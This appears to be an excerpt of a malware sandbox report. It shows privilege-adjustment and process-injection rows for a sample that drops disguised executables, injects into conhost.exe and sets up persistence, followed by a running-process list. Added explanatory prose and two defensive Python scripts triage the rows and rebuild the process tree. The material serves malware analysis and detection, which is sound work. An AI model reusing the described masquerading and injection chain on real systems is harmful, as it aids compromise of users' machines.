Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
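To show how these rows are read in practice, the script below (an added example, not part of the report or of the sandbox) groups the privileges each image enabled and applies a small baseline of what the listed Windows binaries enable on ordinary runs. The baseline table, the rule that a binary outside C:\Windows enabling SeDebugPrivilege rates highest, and the function names are my assumptions, not anything the sandbox provides; the rows are copied from the table above, one per distinct image and privilege.

```python
"""Triage the AdjustPrivilegeToken rows by who enabled what.

Added example, not from the report: it groups the privileges each image
enabled and flags the combinations that a baseline of normal Windows
behaviour does not explain. The baseline below is my own assumption.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

ROW = re.compile(r"^Token: (Se\w+Privilege) N/A (\S+) N/A$")

# Assumed baseline (not from the sandbox): privileges these Windows images
# enable on ordinary runs. None means "too broad to allowlist; skip".
EXPECTED = {
    "powercfg.exe": {"SeShutdownPrivilege", "SeCreatePagefilePrivilege"},
    "dwm.exe": {"SeShutdownPrivilege", "SeCreatePagefilePrivilege"},
    "explorer.exe": {"SeShutdownPrivilege", "SeCreatePagefilePrivilege"},
    "svchost.exe": None,
}
WINDOWS_DIR = "c:\\windows\\"

# Constructed input: rows copied from the table above, one per distinct
# image/privilege pair (the sandbox repeats a row for every call).
ROWS = r"""
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\driverPerf\cominto.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
"""


def parse(text):
    """Map image path -> set of privileges it enabled."""
    privs = defaultdict(set)
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(2)].add(m.group(1))
    return privs


def assess(image, privs):
    """Return (severity, reason), or None when the baseline explains the rows."""
    low = image.lower()
    name = PureWindowsPath(low).name
    if not low.startswith(WINDOWS_DIR):
        # A binary outside C:\Windows adjusting its token is worth a look;
        # SeDebugPrivilege (needed to open other processes) is the strongest case.
        sev = "high" if "SeDebugPrivilege" in privs else "medium"
        return sev, f"{name} runs from {image} and enabled {sorted(privs)}"
    allowed = EXPECTED.get(name, set())
    if allowed is None:
        return None
    extra = privs - allowed
    if not extra:
        return None
    if name == "powershell.exe" and extra == {"SeDebugPrivilege"}:
        # Scripts that touch other processes do this; the command line decides.
        return "medium", "powershell.exe enabled SeDebugPrivilege; review its command line"
    return "high", f"{name} enabled {sorted(extra)}, which its baseline does not include"


def triage(text):
    """Image path -> (severity, reason) for every image the baseline cannot explain."""
    findings = {}
    for image, privs in parse(text).items():
        verdict = assess(image, privs)
        if verdict:
            findings[image] = verdict
    return findings


if __name__ == "__main__":
    for image, (sev, why) in sorted(triage(ROWS).items(), key=lambda kv: kv[1][0]):
        print(f"{sev:6} {image}: {why}")
```

Run as-is it reports the two dropped binaries, conhost.exe and dllhost.exe as high, powershell.exe as medium, and stays silent on powercfg.exe, dwm.exe, Explorer.EXE and svchost.exe. The point of the baseline is that the privilege name alone is never the signal; the image path and the pairing are.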

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

The sandbox raises this signature on the writes CreateProcess makes into a freshly created child, so the rows below are in effect a process tree keyed by PID (each creation shows up as two or three writes). Read that way, the sample (PID 1892) starts six cmd.exe children, which in turn launch powershell.exe or one of the dropped files in the user's Temp directory (explorer.exe, two svchost.exe instances, windowshost.exe); windowshost.exe runs a script through WScript.exe whose cmd.exe starts C:\driverPerf\cominto.exe. The two dropped svchost.exe instances (PIDs 1640 and 2012) create C:\Windows\System32\conhost.exe, and that conhost.exe then creates the cmd.exe children that run sc.exe and powershell.exe. A genuine console host does not create processes, so a conhost.exe that does is best read as hosting code that was injected into it.

Description Indicator Process Target
PID 1892 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 3980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 3980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 3508 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4908 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 4908 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 3412 wrote to memory of 1532 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 3412 wrote to memory of 1532 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 3412 wrote to memory of 1532 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 3600 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 3600 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 1532 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 1532 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 1532 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 3084 wrote to memory of 2156 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3084 wrote to memory of 2156 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3084 wrote to memory of 2156 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2156 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 2156 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 3508 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 1640 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 1640 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 2012 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 2012 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 2012 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 4340 wrote to memory of 3596 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4340 wrote to memory of 3596 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1432 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1432 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 3596 wrote to memory of 1352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3596 wrote to memory of 1352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1432 wrote to memory of 2440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1432 wrote to memory of 2440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4308 wrote to memory of 1468 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1468 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1472 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1472 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1468 wrote to memory of 1656 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
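The rows above are the sandbox's record of CreateProcess writing into each new child, so they double as a parent/child tree keyed by PID. The script below, an added example rather than anything from the report or the sandbox vendor, parses the distinct rows copied from the table, collapses the repeated writes, and prints the tree and the lineage of any PID (for instance the chain that ends in C:\driverPerf\cominto.exe). The parser assumes the row format shown here and image paths without spaces, which holds for every row in this table; the function names are mine.

```python
"""Rebuild the process tree from the sandbox's 'wrote to memory' rows.

Added example, not part of the sandbox report: the sandbox raises the
WriteProcessMemory signature on the writes CreateProcess makes into a new
child, so each row is really a parent -> child edge keyed by PID.
"""
import re
from collections import defaultdict

ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")

# Constructed input: the distinct parent/child rows of the table above, with
# one of the sandbox's repeated rows left in so the parser must collapse it.
ROWS = r"""
PID 1892 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 1892 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 3508 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4908 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 3412 wrote to memory of 1532 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 3600 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 1532 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 3084 wrote to memory of 2156 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2156 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 3508 wrote to memory of 1620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 2012 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\System32\conhost.exe
PID 4340 wrote to memory of 3596 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1432 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 3596 wrote to memory of 1352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1432 wrote to memory of 2440 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4308 wrote to memory of 1468 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4308 wrote to memory of 1472 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1468 wrote to memory of 1656 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
"""


def parse(text):
    """Map (ppid, pid) -> (parent image, child image); repeated rows collapse."""
    edges = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            ppid, pid, parent_image, child_image = m.groups()
            edges[(int(ppid), int(pid))] = (parent_image, child_image)
    return edges


def build(edges):
    """Return the parent map, the pid -> image map and the parent -> [children] map."""
    parent, image, children = {}, {}, defaultdict(list)
    for (ppid, pid), (parent_image, child_image) in edges.items():
        image.setdefault(ppid, parent_image)
        image[pid] = child_image
        parent[pid] = ppid
        children[ppid].append(pid)
    return parent, image, children


def ancestry(pid, parent):
    """PIDs from the root of the tree down to pid."""
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return chain[::-1]


def roots(parent, image):
    """PIDs that never appear as a child: the top of each tree."""
    return sorted(p for p in image if p not in parent)


def render(pid, image, children, depth=0, out=None):
    """Indented one-line-per-process view of the subtree under pid."""
    out = [] if out is None else out
    out.append("  " * depth + f"{pid} {image[pid]}")
    for child in children.get(pid, []):
        render(child, image, children, depth + 1, out)
    return out


if __name__ == "__main__":
    parent, image, children = build(parse(ROWS))
    for root in roots(parent, image):
        print("\n".join(render(root, image, children)))
    print("lineage of 4440:", " -> ".join(map(str, ancestry(4440, parent))))
```

The same parser works on the full table: paste all rows into ROWS and the repeated writes fold into one edge each. Because the rows record only process creation, a process that was injected into rather than created (the conhost.exe instances here) still appears as an ordinary child; the tell is the children it goes on to create.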

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe
    winlogon.exe

C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe
    "dwm.exe"

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe
    C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\sihost.exe
    sihost.exe

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

